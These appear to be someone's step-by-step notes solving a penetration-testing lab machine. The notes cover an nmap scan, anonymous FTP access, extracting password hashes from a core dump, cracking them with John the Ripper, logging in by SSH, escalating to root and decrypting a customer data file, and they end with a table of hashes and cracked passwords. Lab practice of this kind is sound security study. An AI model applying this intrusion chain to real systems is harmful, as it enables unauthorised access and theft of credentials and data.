nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.110

firefox 192.168.1.110

[+]kate -> make list of possible usernames

// lastF, fLast

ftp 192.168.1.110

// Username: anonymous. Password: [Blank]

ls -a

cd download

ls -a

cd etc

ls -a

get core

exit

strings core

[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow

cd tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords



john

./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous

ssh ccofee@192.168.1.110
//Password: Diatomaceous

ls -a

cd ..

ls -a

cd root/

ls -a

cd .save/ 

su
//Password: Complexity

cd .save/

ls -a

cat copy.sh

openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

ls -a

cat customer_account.csv 
// GAME OVER



----------------------------------------------------------------------------------------------------
Users
root:Complexity      = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:              = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy      = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------